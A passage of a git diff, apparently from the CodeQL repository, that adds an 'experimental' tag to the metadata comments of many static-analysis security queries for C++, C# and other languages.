.../Security/CWE/CWE-089/MyBatisAnnotationSqlInjection.ql | 1 + .../Security/CWE/CWE-089/MyBatisMapperXmlSqlInjection.ql | 1 + .../experimental/Security/CWE/CWE-094/BeanShellInjection.ql | 1 + .../experimental/Security/CWE/CWE-094/InsecureDexLoading.ql | 1 + .../src/experimental/Security/CWE/CWE-094/JShellInjection.ql | 1 + .../Security/CWE/CWE-094/JakartaExpressionInjection.ql | 1 + .../src/experimental/Security/CWE/CWE-094/JythonInjection.ql | 1 + .../src/experimental/Security/CWE/CWE-094/ScriptInjection.ql | 1 + .../Security/CWE/CWE-094/SpringImplicitViewManipulation.ql | 1 + .../Security/CWE/CWE-094/SpringViewManipulation.ql | 1 + .../Security/CWE/CWE-1004/InsecureTomcatConfig.ql | 1 + .../Security/CWE/CWE-1004/SensitiveCookieNotHttpOnly.ql | 1 + .../Security/CWE/CWE-200/InsecureWebResourceResponse.ql | 1 + .../Security/CWE/CWE-200/SensitiveAndroidFileLeak.ql | 1 + .../CWE/CWE-208/PossibleTimingAttackAgainstSignature.ql | 1 + .../Security/CWE/CWE-208/TimingAttackAgainstHeader.ql | 1 + .../Security/CWE/CWE-208/TimingAttackAgainstSignature.ql | 1 + .../Security/CWE/CWE-295/JxBrowserWithoutCertValidation.ql | 1 + .../Security/CWE/CWE-297/IgnoredHostnameVerification.ql | 1 + .../Security/CWE/CWE-297/InsecureLdapEndpoint.ql | 1 + .../Security/CWE/CWE-299/DisabledRevocationChecking.ql | 1 + .../src/experimental/Security/CWE/CWE-321/HardcodedJwtKey.ql | 1 + .../experimental/Security/CWE/CWE-327/UnsafeTlsVersion.ql | 1 + .../src/experimental/Security/CWE/CWE-346/UnvalidatedCors.ql | 1 + .../CWE/CWE-348/ClientSuppliedIpUsedInSecurityCheck.ql | 1 + .../src/experimental/Security/CWE/CWE-352/JsonpInjection.ql | 1 + .../experimental/Security/CWE/CWE-400/ThreadResourceAbuse.ql | 1 + .../experimental/Security/CWE/CWE-470/UnsafeReflection.ql | 1 + java/ql/src/experimental/Security/CWE/CWE-489/EJBMain.ql | 1 + .../experimental/Security/CWE/CWE-489/WebComponentMain.ql | 1 + java/ql/src/experimental/Security/CWE/CWE-489/devMode.ql | 1 + .../Security/CWE/CWE-502/UnsafeDeserializationRmi.ql | 1 + .../CWE/CWE-502/UnsafeSpringExporterInConfigurationClass.ql | 1 + .../CWE/CWE-502/UnsafeSpringExporterInXMLConfiguration.ql | 1 + .../experimental/Security/CWE/CWE-522/InsecureLdapAuth.ql | 1 + .../Security/CWE/CWE-548/InsecureDirectoryConfig.ql | 1 + .../experimental/Security/CWE/CWE-552/UnsafeUrlForward.ql | 1 + .../Security/CWE/CWE-555/CredentialsInPropertiesFile.ql | 1 + .../Security/CWE/CWE-555/PasswordInConfigurationFile.ql | 1 + .../experimental/Security/CWE/CWE-598/SensitiveGetQuery.ql | 1 + .../Security/CWE/CWE-600/UncaughtServletException.ql | 1 + .../experimental/Security/CWE/CWE-601/SpringUrlRedirect.ql | 1 + java/ql/src/experimental/Security/CWE/CWE-611/XXE.ql | 1 + java/ql/src/experimental/Security/CWE/CWE-611/XXELocal.ql | 1 + .../experimental/Security/CWE/CWE-625/PermissiveDotRegex.ql | 1 + .../src/experimental/Security/CWE/CWE-652/XQueryInjection.ql | 1 + .../CWE/CWE-665/InsecureRmiJmxEnvironmentConfiguration.ql | 1 + .../src/experimental/Security/CWE/CWE-755/NFEAndroidDoS.ql | 1 + .../src/experimental/Security/CWE/CWE-759/HashWithoutSalt.ql | 1 + .../Security/CWE/CWE-939/IncorrectURLVerification.ql | 1 + .../src/experimental/Security/CWE-094/UntrustedCheckout.ql | 1 + .../src/experimental/Security/CWE-340/TokenBuiltFromUUID.ql | 1 + javascript/ql/src/experimental/Security/CWE-918/SSRF.ql | 1 + python/ql/src/experimental/Security/CWE-022/ZipSlip.ql | 1 + .../ql/src/experimental/Security/CWE-022bis/TarSlipImprov.ql | 1 + .../src/experimental/Security/CWE-074/TemplateInjection.ql | 1 + python/ql/src/experimental/Security/CWE-079/ReflectedXSS.ql | 1 + python/ql/src/experimental/Security/CWE-091/Xslt.ql | 1 + .../ql/src/experimental/Security/CWE-113/HeaderInjection.ql | 1 + python/ql/src/experimental/Security/CWE-1236/CsvInjection.ql | 1 + .../ql/src/experimental/Security/CWE-287/ImproperLdapAuth.ql | 1 + .../Azure/UnsafeUsageOfClientSideEncryptionVersion.ql | 1 + .../src/experimental/Security/CWE-338/InsecureRandomness.ql | 1 + .../src/experimental/Security/CWE-340/TokenBuiltFromUUID.ql | 1 + .../experimental/Security/CWE-347/JWTEmptyKeyOrAlgorithm.ql | 1 + .../CWE-347/JWTMissingSecretOrPublicKeyVerification.ql | 1 + .../Security/CWE-348/ClientSuppliedIpUsedInSecurityCheck.ql | 1 + .../ql/src/experimental/Security/CWE-522/LDAPInsecureAuth.ql | 1 + .../src/experimental/Security/CWE-611/SimpleXmlRpcServer.ql | 1 + .../ql/src/experimental/Security/CWE-614/CookieInjection.ql | 1 + .../ql/src/experimental/Security/CWE-614/InsecureCookie.ql | 1 + .../ql/src/experimental/Security/CWE-943/NoSQLInjection.ql | 1 + ruby/ql/src/experimental/cwe-807/ConditionalBypass.ql | 1 + .../src/experimental/decompression-api/DecompressionApi.ql | 4 +++- .../experimental/improper-memoization/ImproperMemoization.ql | 1 + .../manually-check-http-verb/ManuallyCheckHttpVerb.ql | 1 + ruby/ql/src/experimental/weak-params/WeakParams.ql | 1 + 148 files changed, 155 insertions(+), 3 deletions(-) diff --git a/cpp/ql/src/experimental/Likely Bugs/ArrayAccessProductFlow.ql b/cpp/ql/src/experimental/Likely Bugs/ArrayAccessProductFlow.ql index b9b0383fd6b..61c0af6be26 100644 --- a/cpp/ql/src/experimental/Likely Bugs/ArrayAccessProductFlow.ql +++ b/cpp/ql/src/experimental/Likely Bugs/ArrayAccessProductFlow.ql @@ -6,6 +6,7 @@ * @id cpp/off-by-one-array-access * @tags reliability * security + * experimental */ import cpp diff --git a/cpp/ql/src/experimental/Likely Bugs/OverrunWriteProductFlow.ql b/cpp/ql/src/experimental/Likely Bugs/OverrunWriteProductFlow.ql index 0f727c5e54d..5e0d1d7b5bb 100644 --- a/cpp/ql/src/experimental/Likely Bugs/OverrunWriteProductFlow.ql +++ b/cpp/ql/src/experimental/Likely Bugs/OverrunWriteProductFlow.ql @@ -7,6 +7,7 @@ * @id cpp/overrun-write * @tags reliability * security + * experimental * external/cwe/cwe-119 * external/cwe/cwe-131 */ diff --git a/cpp/ql/src/experimental/Likely Bugs/RedundantNullCheckParam.ql b/cpp/ql/src/experimental/Likely Bugs/RedundantNullCheckParam.ql index 2ee4559cdae..36e42cae92a 100644 --- a/cpp/ql/src/experimental/Likely Bugs/RedundantNullCheckParam.ql +++ b/cpp/ql/src/experimental/Likely Bugs/RedundantNullCheckParam.ql @@ -9,6 +9,7 @@ * @tags reliability * security * external/cwe/cwe-476 + * experimental */ import cpp diff --git a/cpp/ql/src/experimental/Security/CWE/CWE-020/LateCheckOfFunctionArgument.ql b/cpp/ql/src/experimental/Security/CWE/CWE-020/LateCheckOfFunctionArgument.ql index 0d426492cdf..07d18992db6 100644 --- a/cpp/ql/src/experimental/Security/CWE/CWE-020/LateCheckOfFunctionArgument.ql +++ b/cpp/ql/src/experimental/Security/CWE/CWE-020/LateCheckOfFunctionArgument.ql @@ -9,6 +9,7 @@ * @precision medium * @tags correctness * security + * experimental * external/cwe/cwe-20 */ diff --git a/cpp/ql/src/experimental/Security/CWE/CWE-020/NoCheckBeforeUnsafePutUser.ql b/cpp/ql/src/experimental/Security/CWE/CWE-020/NoCheckBeforeUnsafePutUser.ql index f01a7cb1ed0..8a93e93476e 100644 --- a/cpp/ql/src/experimental/Security/CWE/CWE-020/NoCheckBeforeUnsafePutUser.ql +++ b/cpp/ql/src/experimental/Security/CWE/CWE-020/NoCheckBeforeUnsafePutUser.ql @@ -11,6 +11,7 @@ * @problem.severity warning * @security-severity 7.5 * @tags security + * experimental * external/cwe/cwe-020 */ diff --git a/cpp/ql/src/experimental/Security/CWE/CWE-078/WordexpTainted.ql b/cpp/ql/src/experimental/Security/CWE/CWE-078/WordexpTainted.ql index 40b61ff60f6..f4de1251e8b 100644 --- a/cpp/ql/src/experimental/Security/CWE/CWE-078/WordexpTainted.ql +++ b/cpp/ql/src/experimental/Security/CWE/CWE-078/WordexpTainted.ql @@ -8,6 +8,7 @@ * @precision high * @id cpp/wordexp-injection * @tags security + * experimental * external/cwe/cwe-078 */ diff --git a/cpp/ql/src/experimental/Security/CWE/CWE-1041/FindWrapperFunctions.ql b/cpp/ql/src/experimental/Security/CWE/CWE-1041/FindWrapperFunctions.ql index 700993b58ed..cc25326f0b4 100644 --- a/cpp/ql/src/experimental/Security/CWE/CWE-1041/FindWrapperFunctions.ql +++ b/cpp/ql/src/experimental/Security/CWE/CWE-1041/FindWrapperFunctions.ql @@ -8,6 +8,7 @@ * @tags correctness * maintainability * security + * experimental * external/cwe/cwe-1041 */ diff --git a/cpp/ql/src/experimental/Security/CWE/CWE-1126/DeclarationOfVariableWithUnnecessarilyWideScope.ql b/cpp/ql/src/experimental/Security/CWE/CWE-1126/DeclarationOfVariableWithUnnecessarilyWideScope.ql index e73f36145c6..136931f00ec 100644 --- a/cpp/ql/src/experimental/Security/CWE/CWE-1126/DeclarationOfVariableWithUnnecessarilyWideScope.ql +++ b/cpp/ql/src/experimental/Security/CWE/CWE-1126/DeclarationOfVariableWithUnnecessarilyWideScope.ql @@ -9,6 +9,7 @@ * @precision medium * @tags correctness * security + * experimental * external/cwe/cwe-1126 */ diff --git a/cpp/ql/src/experimental/Security/CWE/CWE-120/MemoryUnsafeFunctionScan.ql b/cpp/ql/src/experimental/Security/CWE/CWE-120/MemoryUnsafeFunctionScan.ql index dd98d1b6053..c74918dbb88 100644 --- a/cpp/ql/src/experimental/Security/CWE/CWE-120/MemoryUnsafeFunctionScan.ql +++ b/cpp/ql/src/experimental/Security/CWE/CWE-120/MemoryUnsafeFunctionScan.ql @@ -6,6 +6,7 @@ * @id cpp/memory-unsafe-function-scan * @tags reliability * security + * experimental * external/cwe/cwe-120 */ diff --git a/cpp/ql/src/experimental/Security/CWE/CWE-125/DangerousWorksWithMultibyteOrWideCharacters.ql b/cpp/ql/src/experimental/Security/CWE/CWE-125/DangerousWorksWithMultibyteOrWideCharacters.ql index 0b7555c9e41..12a44be0d1f 100644 --- a/cpp/ql/src/experimental/Security/CWE/CWE-125/DangerousWorksWithMultibyteOrWideCharacters.ql +++ b/cpp/ql/src/experimental/Security/CWE/CWE-125/DangerousWorksWithMultibyteOrWideCharacters.ql @@ -7,6 +7,7 @@ * @precision medium * @tags correctness * security + * experimental * external/cwe/cwe-125 */ diff --git a/cpp/ql/src/experimental/Security/CWE/CWE-190/AllocMultiplicationOverflow.ql b/cpp/ql/src/experimental/Security/CWE/CWE-190/AllocMultiplicationOverflow.ql index 3a253854679..86423e8e264 100644 --- a/cpp/ql/src/experimental/Security/CWE/CWE-190/AllocMultiplicationOverflow.ql +++ b/cpp/ql/src/experimental/Security/CWE/CWE-190/AllocMultiplicationOverflow.ql @@ -6,6 +6,7 @@ * @precision low * @tags security * correctness + * experimental * external/cwe/cwe-190 * external/cwe/cwe-128 * @id cpp/multiplication-overflow-in-alloc diff --git a/cpp/ql/src/experimental/Security/CWE/CWE-190/DangerousUseOfTransformationAfterOperation.ql b/cpp/ql/src/experimental/Security/CWE/CWE-190/DangerousUseOfTransformationAfterOperation.ql index 026c279de7c..e848b97ef8f 100644 --- a/cpp/ql/src/experimental/Security/CWE/CWE-190/DangerousUseOfTransformationAfterOperation.ql +++ b/cpp/ql/src/experimental/Security/CWE/CWE-190/DangerousUseOfTransformationAfterOperation.ql @@ -7,6 +7,7 @@ * @precision medium * @tags correctness * security + * experimental * external/cwe/cwe-190 */ diff --git a/cpp/ql/src/experimental/Security/CWE/CWE-193/ConstantSizeArrayOffByOne.ql b/cpp/ql/src/experimental/Security/CWE/CWE-193/ConstantSizeArrayOffByOne.ql index 990c4356425..b7c2810541f 100644 --- a/cpp/ql/src/experimental/Security/CWE/CWE-193/ConstantSizeArrayOffByOne.ql +++ b/cpp/ql/src/experimental/Security/CWE/CWE-193/ConstantSizeArrayOffByOne.ql @@ -7,6 +7,7 @@ * @id cpp/constant-array-overflow * @tags reliability * security + * experimental */ import experimental.semmle.code.cpp.semantic.analysis.RangeAnalysis diff --git a/cpp/ql/src/experimental/Security/CWE/CWE-193/InvalidPointerDeref.ql b/cpp/ql/src/experimental/Security/CWE/CWE-193/InvalidPointerDeref.ql index d2593dd05a0..8ecd855a3bc 100644 --- a/cpp/ql/src/experimental/Security/CWE/CWE-193/InvalidPointerDeref.ql +++ b/cpp/ql/src/experimental/Security/CWE/CWE-193/InvalidPointerDeref.ql @@ -8,6 +8,7 @@ * @id cpp/invalid-pointer-deref * @tags reliability * security + * experimental * external/cwe/cwe-119 * external/cwe/cwe-125 * external/cwe/cwe-193 diff --git a/cpp/ql/src/experimental/Security/CWE/CWE-200/ExposureSensitiveInformationUnauthorizedActor.ql b/cpp/ql/src/experimental/Security/CWE/CWE-200/ExposureSensitiveInformationUnauthorizedActor.ql index ec32ccd4bfc..61708ce5da0 100644 --- a/cpp/ql/src/experimental/Security/CWE/CWE-200/ExposureSensitiveInformationUnauthorizedActor.ql +++ b/cpp/ql/src/experimental/Security/CWE/CWE-200/ExposureSensitiveInformationUnauthorizedActor.ql @@ -8,6 +8,7 @@ * @tags correctness * maintainability * security + * experimental * external/cwe/cwe-200 * external/cwe/cwe-264 */ diff --git a/cpp/ql/src/experimental/Security/CWE/CWE-243/IncorrectChangingWorkingDirectory.ql b/cpp/ql/src/experimental/Security/CWE/CWE-243/IncorrectChangingWorkingDirectory.ql index 02d57ee3c3f..ce5f4dd00f8 100644 --- a/cpp/ql/src/experimental/Security/CWE/CWE-243/IncorrectChangingWorkingDirectory.ql +++ b/cpp/ql/src/experimental/Security/CWE/CWE-243/IncorrectChangingWorkingDirectory.ql @@ -7,6 +7,7 @@ * @precision medium * @tags correctness * security + * experimental * external/cwe/cwe-243 * external/cwe/cwe-252 */ diff --git a/cpp/ql/src/experimental/Security/CWE/CWE-266/IncorrectPrivilegeAssignment.ql b/cpp/ql/src/experimental/Security/CWE/CWE-266/IncorrectPrivilegeAssignment.ql index 5bdd5a21fe5..a8f93155599 100644 --- a/cpp/ql/src/experimental/Security/CWE/CWE-266/IncorrectPrivilegeAssignment.ql +++ b/cpp/ql/src/experimental/Security/CWE/CWE-266/IncorrectPrivilegeAssignment.ql @@ -8,6 +8,7 @@ * @tags correctness * maintainability * security + * experimental * external/cwe/cwe-266 * external/cwe/cwe-264 * external/cwe/cwe-200 diff --git a/cpp/ql/src/experimental/Security/CWE/CWE-273/PrivilegeDroppingOutoforder.ql b/cpp/ql/src/experimental/Security/CWE/CWE-273/PrivilegeDroppingOutoforder.ql index 0491d711833..67464d4b37a 100644 --- a/cpp/ql/src/experimental/Security/CWE/CWE-273/PrivilegeDroppingOutoforder.ql +++ b/cpp/ql/src/experimental/Security/CWE/CWE-273/PrivilegeDroppingOutoforder.ql @@ -8,6 +8,7 @@ * @problem.severity recommendation * @id cpp/drop-linux-privileges-outoforder * @tags security + * experimental * external/cwe/cwe-273 * @precision medium */ diff --git a/cpp/ql/src/experimental/Security/CWE/CWE-285/PamAuthorization.ql b/cpp/ql/src/experimental/Security/CWE/CWE-285/PamAuthorization.ql index 5292a705d93..59c4a68c92a 100644 --- a/cpp/ql/src/experimental/Security/CWE/CWE-285/PamAuthorization.ql +++ b/cpp/ql/src/experimental/Security/CWE/CWE-285/PamAuthorization.ql @@ -5,6 +5,7 @@ * @problem.severity error * @id cpp/pam-auth-bypass * @tags security + * experimental * external/cwe/cwe-285 */ diff --git a/cpp/ql/src/experimental/Security/CWE/CWE-359/PrivateCleartextWrite.ql b/cpp/ql/src/experimental/Security/CWE/CWE-359/PrivateCleartextWrite.ql index 133b38372a6..273e3b7855a 100644 --- a/cpp/ql/src/experimental/Security/CWE/CWE-359/PrivateCleartextWrite.ql +++ b/cpp/ql/src/experimental/Security/CWE/CWE-359/PrivateCleartextWrite.ql @@ -6,6 +6,7 @@ * @problem.severity error * @id cpp/private-cleartext-write * @tags security + * experimental * external/cwe/cwe-359 */ diff --git a/cpp/ql/src/experimental/Security/CWE/CWE-362/double-fetch.ql b/cpp/ql/src/experimental/Security/CWE/CWE-362/double-fetch.ql index 39ab8c1ead4..4f641ba3406 100644 --- a/cpp/ql/src/experimental/Security/CWE/CWE-362/double-fetch.ql +++ b/cpp/ql/src/experimental/Security/CWE/CWE-362/double-fetch.ql @@ -11,6 +11,7 @@ * @problem.severity warning * @security-severity 7.5 * @tags security + * experimental * external/cwe/cwe-362 */ diff --git a/cpp/ql/src/experimental/Security/CWE/CWE-377/InsecureTemporaryFile.ql b/cpp/ql/src/experimental/Security/CWE/CWE-377/InsecureTemporaryFile.ql index 0852cb90918..f62222eb5b9 100644 --- a/cpp/ql/src/experimental/Security/CWE/CWE-377/InsecureTemporaryFile.ql +++ b/cpp/ql/src/experimental/Security/CWE/CWE-377/InsecureTemporaryFile.ql @@ -7,6 +7,7 @@ * @precision medium * @tags correctness * security + * experimental * external/cwe/cwe-377 */ diff --git a/cpp/ql/src/experimental/Security/CWE/CWE-401/MemoryLeakOnFailedCallToRealloc.ql b/cpp/ql/src/experimental/Security/CWE/CWE-401/MemoryLeakOnFailedCallToRealloc.ql index ce991a42a68..3132b103bbc 100644 --- a/cpp/ql/src/experimental/Security/CWE/CWE-401/MemoryLeakOnFailedCallToRealloc.ql +++ b/cpp/ql/src/experimental/Security/CWE/CWE-401/MemoryLeakOnFailedCallToRealloc.ql @@ -8,6 +8,7 @@ * @precision medium * @tags correctness * security + * experimental * external/cwe/cwe-401 */ diff --git a/cpp/ql/src/experimental/Security/CWE/CWE-415/DoubleFree.ql b/cpp/ql/src/experimental/Security/CWE/CWE-415/DoubleFree.ql index 0544c2aefd5..a6b70d9c506 100644 --- a/cpp/ql/src/experimental/Security/CWE/CWE-415/DoubleFree.ql +++ b/cpp/ql/src/experimental/Security/CWE/CWE-415/DoubleFree.ql @@ -6,6 +6,7 @@ * @problem.severity warning * @precision medium * @tags security + * experimental * external/cwe/cwe-415 */ diff --git a/cpp/ql/src/experimental/Security/CWE/CWE-476/DangerousUseOfExceptionBlocks.ql b/cpp/ql/src/experimental/Security/CWE/CWE-476/DangerousUseOfExceptionBlocks.ql index 2feca267902..4eb24c14322 100644 --- a/cpp/ql/src/experimental/Security/CWE/CWE-476/DangerousUseOfExceptionBlocks.ql +++ b/cpp/ql/src/experimental/Security/CWE/CWE-476/DangerousUseOfExceptionBlocks.ql @@ -7,6 +7,7 @@ * @precision medium * @tags correctness * security + * experimental * external/cwe/cwe-476 * external/cwe/cwe-415 */ diff --git a/cpp/ql/src/experimental/Security/CWE/CWE-561/FindIncorrectlyUsedSwitch.ql b/cpp/ql/src/experimental/Security/CWE/CWE-561/FindIncorrectlyUsedSwitch.ql index 2de9cf5fc78..a643c3e3bf0 100644 --- a/cpp/ql/src/experimental/Security/CWE/CWE-561/FindIncorrectlyUsedSwitch.ql +++ b/cpp/ql/src/experimental/Security/CWE/CWE-561/FindIncorrectlyUsedSwitch.ql @@ -8,6 +8,7 @@ * @precision medium * @tags correctness * security + * experimental * external/cwe/cwe-561 * external/cwe/cwe-691 * external/cwe/cwe-478 diff --git a/cpp/ql/src/experimental/Security/CWE/CWE-670/DangerousUseSSL_shutdown.ql b/cpp/ql/src/experimental/Security/CWE/CWE-670/DangerousUseSSL_shutdown.ql index 187b30a73b9..a5270518894 100644 --- a/cpp/ql/src/experimental/Security/CWE/CWE-670/DangerousUseSSL_shutdown.ql +++ b/cpp/ql/src/experimental/Security/CWE/CWE-670/DangerousUseSSL_shutdown.ql @@ -7,6 +7,7 @@ * @precision medium * @tags correctness * security + * experimental * external/cwe/cwe-670 */ diff --git a/cpp/ql/src/experimental/Security/CWE/CWE-675/DoubleRelease.ql b/cpp/ql/src/experimental/Security/CWE/CWE-675/DoubleRelease.ql index 7a884769bf8..a933ed063b2 100644 --- a/cpp/ql/src/experimental/Security/CWE/CWE-675/DoubleRelease.ql +++ b/cpp/ql/src/experimental/Security/CWE/CWE-675/DoubleRelease.ql @@ -6,6 +6,7 @@ * @problem.severity warning * @precision medium * @tags security + * experimental * external/cwe/cwe-675 * external/cwe/cwe-666 */ diff --git a/cpp/ql/src/experimental/Security/CWE/CWE-691/InsufficientControlFlowManagementAfterRefactoringTheCode.ql b/cpp/ql/src/experimental/Security/CWE/CWE-691/InsufficientControlFlowManagementAfterRefactoringTheCode.ql index 72c622baf76..e0b248c2066 100644 --- a/cpp/ql/src/experimental/Security/CWE/CWE-691/InsufficientControlFlowManagementAfterRefactoringTheCode.ql +++ b/cpp/ql/src/experimental/Security/CWE/CWE-691/InsufficientControlFlowManagementAfterRefactoringTheCode.ql @@ -10,6 +10,7 @@ * @precision medium * @tags correctness * security + * experimental * external/cwe/cwe-691 */ diff --git a/cpp/ql/src/experimental/Security/CWE/CWE-691/InsufficientControlFlowManagementWhenUsingBitOperations.ql b/cpp/ql/src/experimental/Security/CWE/CWE-691/InsufficientControlFlowManagementWhenUsingBitOperations.ql index 72d7625b517..2772fbabd22 100644 --- a/cpp/ql/src/experimental/Security/CWE/CWE-691/InsufficientControlFlowManagementWhenUsingBitOperations.ql +++ b/cpp/ql/src/experimental/Security/CWE/CWE-691/InsufficientControlFlowManagementWhenUsingBitOperations.ql @@ -8,6 +8,7 @@ * @precision medium * @tags correctness * security + * experimental * external/cwe/cwe-691 */ diff --git a/cpp/ql/src/experimental/Security/CWE/CWE-703/FindIncorrectlyUsedExceptions.ql b/cpp/ql/src/experimental/Security/CWE/CWE-703/FindIncorrectlyUsedExceptions.ql index 97c1e410066..5ee747db880 100644 --- a/cpp/ql/src/experimental/Security/CWE/CWE-703/FindIncorrectlyUsedExceptions.ql +++ b/cpp/ql/src/experimental/Security/CWE/CWE-703/FindIncorrectlyUsedExceptions.ql @@ -7,6 +7,7 @@ * @precision medium * @tags correctness * security + * experimental * external/cwe/cwe-703 * external/cwe/cwe-248 * external/cwe/cwe-390 diff --git a/cpp/ql/src/experimental/Security/CWE/CWE-754/ImproperCheckReturnValueScanf.ql b/cpp/ql/src/experimental/Security/CWE/CWE-754/ImproperCheckReturnValueScanf.ql index d19f72cf2c7..46d5d618e07 100644 --- a/cpp/ql/src/experimental/Security/CWE/CWE-754/ImproperCheckReturnValueScanf.ql +++ b/cpp/ql/src/experimental/Security/CWE/CWE-754/ImproperCheckReturnValueScanf.ql @@ -7,6 +7,7 @@ * @precision medium * @tags correctness * security + * experimental * external/cwe/cwe-754 * external/cwe/cwe-908 */ diff --git a/cpp/ql/src/experimental/Security/CWE/CWE-758/UndefinedOrImplementationDefinedBehavior.ql b/cpp/ql/src/experimental/Security/CWE/CWE-758/UndefinedOrImplementationDefinedBehavior.ql index bafe3d13b84..7303aaf9644 100644 --- a/cpp/ql/src/experimental/Security/CWE/CWE-758/UndefinedOrImplementationDefinedBehavior.ql +++ b/cpp/ql/src/experimental/Security/CWE/CWE-758/UndefinedOrImplementationDefinedBehavior.ql @@ -8,6 +8,7 @@ * @problem.severity warning * @precision medium * @tags security + * experimental * external/cwe/cwe-758 */ diff --git a/cpp/ql/src/experimental/Security/CWE/CWE-783/OperatorPrecedenceLogicErrorWhenUseBitwiseOrLogicalOperations.ql b/cpp/ql/src/experimental/Security/CWE/CWE-783/OperatorPrecedenceLogicErrorWhenUseBitwiseOrLogicalOperations.ql index 54a4490dc51..8bb1d0ba97b 100644 --- a/cpp/ql/src/experimental/Security/CWE/CWE-783/OperatorPrecedenceLogicErrorWhenUseBitwiseOrLogicalOperations.ql +++ b/cpp/ql/src/experimental/Security/CWE/CWE-783/OperatorPrecedenceLogicErrorWhenUseBitwiseOrLogicalOperations.ql @@ -8,6 +8,7 @@ * @precision medium * @tags maintainability * readability + * experimental * external/cwe/cwe-783 * external/cwe/cwe-480 */ diff --git a/cpp/ql/src/experimental/Security/CWE/CWE-783/OperatorPrecedenceLogicErrorWhenUseBoolType.ql b/cpp/ql/src/experimental/Security/CWE/CWE-783/OperatorPrecedenceLogicErrorWhenUseBoolType.ql index dd71703b530..d56e09a5284 100644 --- a/cpp/ql/src/experimental/Security/CWE/CWE-783/OperatorPrecedenceLogicErrorWhenUseBoolType.ql +++ b/cpp/ql/src/experimental/Security/CWE/CWE-783/OperatorPrecedenceLogicErrorWhenUseBoolType.ql @@ -8,6 +8,7 @@ * @precision medium * @tags correctness * security + * experimental * external/cwe/cwe-783 * external/cwe/cwe-480 */ diff --git a/cpp/ql/src/experimental/Security/CWE/CWE-787/UnsignedToSignedPointerArith.ql b/cpp/ql/src/experimental/Security/CWE/CWE-787/UnsignedToSignedPointerArith.ql index 4327d6e364e..aead62522bd 100644 --- a/cpp/ql/src/experimental/Security/CWE/CWE-787/UnsignedToSignedPointerArith.ql +++ b/cpp/ql/src/experimental/Security/CWE/CWE-787/UnsignedToSignedPointerArith.ql @@ -6,6 +6,7 @@ * @problem.severity warning * @tags reliability * security + * experimental * external/cwe/cwe-787 */ diff --git a/cpp/ql/src/experimental/Security/CWE/CWE-788/AccessOfMemoryLocationAfterEndOfBufferUsingStrlen.ql b/cpp/ql/src/experimental/Security/CWE/CWE-788/AccessOfMemoryLocationAfterEndOfBufferUsingStrlen.ql index 3d1e0637fe6..083d7b1a669 100644 --- a/cpp/ql/src/experimental/Security/CWE/CWE-788/AccessOfMemoryLocationAfterEndOfBufferUsingStrlen.ql +++ b/cpp/ql/src/experimental/Security/CWE/CWE-788/AccessOfMemoryLocationAfterEndOfBufferUsingStrlen.ql @@ -8,6 +8,7 @@ * @precision medium * @tags correctness * security + * experimental * external/cwe/cwe-788 */ diff --git a/csharp/ql/src/experimental/CWE-099/TaintedWebClient.ql b/csharp/ql/src/experimental/CWE-099/TaintedWebClient.ql index 8cee95a3d54..e4d2cbd0d4e 100644 --- a/csharp/ql/src/experimental/CWE-099/TaintedWebClient.ql +++ b/csharp/ql/src/experimental/CWE-099/TaintedWebClient.ql @@ -7,6 +7,7 @@ * @precision high * @id cs/webclient-path-injection * @tags security + * experimental * external/cwe/cwe-099 * external/cwe/cwe-023 * external/cwe/cwe-036 diff --git a/csharp/ql/src/experimental/CWE-918/RequestForgery.ql b/csharp/ql/src/experimental/CWE-918/RequestForgery.ql index 53af17bb842..bdf2e588e88 100644 --- a/csharp/ql/src/experimental/CWE-918/RequestForgery.ql +++ b/csharp/ql/src/experimental/CWE-918/RequestForgery.ql @@ -6,6 +6,7 @@ * @precision high * @id cs/request-forgery * @tags security + * experimental * external/cwe/cwe-918 */ diff --git a/csharp/ql/src/experimental/Security Features/CWE-1004/CookieWithoutHttpOnly.ql b/csharp/ql/src/experimental/Security Features/CWE-1004/CookieWithoutHttpOnly.ql index 0718e840139..c53ad124304 100644 --- a/csharp/ql/src/experimental/Security Features/CWE-1004/CookieWithoutHttpOnly.ql +++ b/csharp/ql/src/experimental/Security Features/CWE-1004/CookieWithoutHttpOnly.ql @@ -9,6 +9,7 @@ * @precision high * @id cs/web/cookie-httponly-not-set * @tags security + * experimental * external/cwe/cwe-1004 */ diff --git a/csharp/ql/src/experimental/Security Features/CWE-327/Azure/UnsafeUsageOfClientSideEncryptionVersion.ql b/csharp/ql/src/experimental/Security Features/CWE-327/Azure/UnsafeUsageOfClientSideEncryptionVersion.ql index be503fe31d1..c218471ac46 100644 --- a/csharp/ql/src/experimental/Security Features/CWE-327/Azure/UnsafeUsageOfClientSideEncryptionVersion.ql +++ b/csharp/ql/src/experimental/Security Features/CWE-327/Azure/UnsafeUsageOfClientSideEncryptionVersion.ql @@ -4,6 +4,7 @@ * @kind problem * @tags security * cryptography + * experimental * external/cwe/cwe-327 * @id cs/azure-storage/unsafe-usage-of-client-side-encryption-version * @problem.severity error diff --git a/csharp/ql/src/experimental/Security Features/CWE-614/CookieWithoutSecure.ql b/csharp/ql/src/experimental/Security Features/CWE-614/CookieWithoutSecure.ql index f27ce50e7fa..c10db6bfb31 100644 --- a/csharp/ql/src/experimental/Security Features/CWE-614/CookieWithoutSecure.ql +++ b/csharp/ql/src/experimental/Security Features/CWE-614/CookieWithoutSecure.ql @@ -8,6 +8,7 @@ * @precision high * @id cs/web/cookie-secure-not-set * @tags security + * experimental * external/cwe/cwe-319 * external/cwe/cwe-614 */ diff --git a/csharp/ql/src/experimental/Security Features/CWE-759/HashWithoutSalt.ql b/csharp/ql/src/experimental/Security Features/CWE-759/HashWithoutSalt.ql index a833ac79898..ab3c7f8d59c 100644 --- a/csharp/ql/src/experimental/Security Features/CWE-759/HashWithoutSalt.ql +++ b/csharp/ql/src/experimental/Security Features/CWE-759/HashWithoutSalt.ql @@ -5,6 +5,7 @@ * @problem.severity error * @id cs/hash-without-salt * @tags security + * experimental * external/cwe-759 */ diff --git a/csharp/ql/src/experimental/Security Features/JsonWebTokenHandler/delegated-security-validations-always-return-true.ql b/csharp/ql/src/experimental/Security Features/JsonWebTokenHandler/delegated-security-validations-always-return-true.ql index 2ee7c7edb1f..f686d8f845f 100644 --- a/csharp/ql/src/experimental/Security Features/JsonWebTokenHandler/delegated-security-validations-always-return-true.ql +++ b/csharp/ql/src/experimental/Security Features/JsonWebTokenHandler/delegated-security-validations-always-return-true.ql @@ -4,6 +4,7 @@ * Higher precision version checks for exception throws, so less false positives are expected. * @kind problem * @tags security + * experimental * JsonWebTokenHandler * manual-verification-required * @id cs/json-webtoken-handler/delegated-security-validations-always-return-true diff --git a/csharp/ql/src/experimental/Security 